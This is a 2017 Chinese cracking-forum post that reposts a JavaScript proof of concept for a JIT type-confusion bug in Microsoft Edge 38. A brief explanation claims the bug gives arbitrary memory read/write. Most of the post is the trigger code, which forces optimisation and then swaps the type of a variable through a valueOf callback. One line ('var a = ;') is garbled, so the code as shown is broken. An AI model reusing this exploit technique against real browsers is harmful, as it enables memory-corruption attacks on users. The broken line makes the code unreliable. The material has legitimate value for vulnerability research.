JackBrown 发表于 2017-3-25 13:35

Edge:导致类型混淆的bug

"use strict";
function func(a, b, c) {
a = 1.2;
b = c; <<<<----------------------- (1)
a = 2.2;
a = 2.3023e-320;
}

function main() {
var a = ;
var b = new Uint32Array(100);

// 强行优化
for (var i = 0; i < 0x10000; i++)
func(a, b, i);

func(a, b, {valueOf: () => {
a = {}; <<<<----------------------- (2)

return 0;
}});

a.toString();
}

main();

在上面的代码中,假定类型的|a|还是一个本地浮动数组,执行(1)后,可以改变它的类型的处理程序((2)),导致类型混淆。
PoC将复制任意内存读/写。
//Edge38.14393.0.0
页: [1]
查看完整版本: Edge:导致类型混淆的bug


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn